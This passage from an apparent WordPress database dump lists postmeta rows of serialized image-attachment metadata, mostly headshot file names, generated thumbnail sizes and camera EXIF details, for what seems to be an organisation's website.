-Caldarazzo-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Sadi-Caldarazzo-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2998,732,'_wp_attached_file','2016/12/Sandra-Hudson-700x933.jpg'),(2999,732,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:933;s:4:\"file\";s:33:\"2016/12/Sandra-Hudson-700x933.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Sandra-Hudson-700x933-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 5c\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431544897\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.12\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3000,733,'_wp_attached_file','2016/12/Shanee-e1482291906241.jpg'),(3001,733,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:259;s:4:\"file\";s:33:\"2016/12/Shanee-e1482291906241.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Shanee-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Shanee-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"Shanee-339x400.jpg\";s:5:\"width\";i:339;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"Shanee-339x300.jpg\";s:5:\"width\";i:339;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"Shanee-339x300.jpg\";s:5:\"width\";i:339;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Shanee-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"Shanee-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"Shanee-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3002,734,'_wp_attached_file','2016/12/TCurtis-e1484268972366.jpg'),(3003,734,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:195;s:6:\"height\";i:215;s:4:\"file\";s:34:\"2016/12/TCurtis-e1484268972366.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1484268972366-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1484268972366-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1484268972366-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1474108005\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"6\";s:8:\"keywords\";a:0:{}}}'),(3004,735,'_wp_attached_file','2016/12/Tracy-Irvin.jpg'),(3005,735,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:133;s:6:\"height\";i:160;s:4:\"file\";s:23:\"2016/12/Tracy-Irvin.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Tracy-Irvin-133x150.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"Tracy-Irvin-133x110.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3006,734,'_edit_lock','1482292071:2'),(3007,734,'_wp_attachment_backup_sizes','a:21:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:700;s:6:\"height\";i:525;s:4:\"file\";s:11:\"TCurtis.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:19:\"TCurtis-600x525.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1482292179446\";a:3:{s:5:\"width\";i:525;s:6:\"height\";i:700;s:4:\"file\";s:26:\"TCurtis-e1482288985389.jpg\";}s:18:\"full-1484268972366\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:267;s:4:\"file\";s:26:\"TCurtis-e1482292179446.jpg\";}s:23:\"thumbnail-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"grid-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"list-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"thumb-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"shop_thumbnail-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"shop_catalog-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"shop_single-1484268972366\";a:4:{s:4:\"file\";s:34:\"TCurtis-e1482288985389-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3008,725,'_edit_lock','1482289017:2'),(3009,725,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:700;s:6:\"height\";i:525;s:4:\"file\";s:10:\"LPrice.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:18:\"LPrice-600x525.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3010,725,'ts_template','a:0:{}'),(3011,725,'_edit_last','2'),(3012,734,'ts_template','a:0:{}'),(3013,734,'_edit_last','2'),(3014,717,'_edit_lock','1482289014:2'),(3015,717,'_wp_attachment_backup_sizes','a:20:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:700;s:6:\"height\";i:525;s:4:\"file\";s:12:\"ECogdell.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"ECogdell-600x525.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1484269686848\";a:3:{s:5:\"width\";i:525;s:6:\"height\";i:700;s:4:\"file\";s:27:\"ECogdell-e1482289106190.jpg\";}s:23:\"thumbnail-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"grid-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"list-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"thumb-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"shop_thumbnail-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"shop_catalog-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"shop_single-1484269686848\";a:4:{s:4:\"file\";s:35:\"ECogdell-e1482289106190-525x600.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3016,717,'ts_template','a:0:{}'),(3017,717,'_edit_last','2'),(3018,733,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:339;s:6:\"height\";i:439;s:4:\"file\";s:10:\"Shanee.jpg\";}}'),(3019,715,'_edit_lock','1482291988:2'),(3020,715,'_wp_attachment_backup_sizes','a:11:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:800;s:4:\"file\";s:15:\"dawnkempweb.jpg\";}s:18:\"full-1484268899215\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:267;s:4:\"file\";s:30:\"dawnkempweb-e1482292072776.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:23:\"dawnkempweb-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3021,715,'ts_template','a:0:{}'),(3022,715,'_edit_last','2'),(3023,713,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:336;s:6:\"height\";i:422;s:4:\"file\";s:12:\"CKinder1.jpg\";}}'),(3024,713,'_edit_lock','1482292174:2'),(3025,713,'ts_template','a:0:{}'),(3026,713,'_edit_last','2'),(3027,733,'_edit_lock','1482292224:2'),(3028,733,'ts_template','a:0:{}'),(3029,733,'_edit_last','2'),(3030,714,'_edit_lock','1482292292:2'),(3031,714,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:700;s:6:\"height\";i:702;s:4:\"file\";s:20:\"Crystal-Whitaker.jpg\";}}'),(3032,714,'ts_template','a:0:{}'),(3033,714,'_edit_last','2'),(3217,786,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(3392,841,'_wp_attached_file','2017/01/Recommendation.png'),(3393,841,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:250;s:4:\"file\";s:26:\"2017/01/Recommendation.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Recommendation-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Recommendation-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Recommendation-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"Recommendation-450x250.png\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"Recommendation-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Recommendation-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Recommendation-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3124,759,'_wp_attached_file','2016/12/Zeta-Phi-Beta-Seal.png'),(3125,759,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2016/12/Zeta-Phi-Beta-Seal.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"Zeta-Phi-Beta-Seal-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3576,899,'_wp_attached_file','2017/01/TamikaDaniel.jpg'),(3577,899,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:24:\"2017/01/TamikaDaniel.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\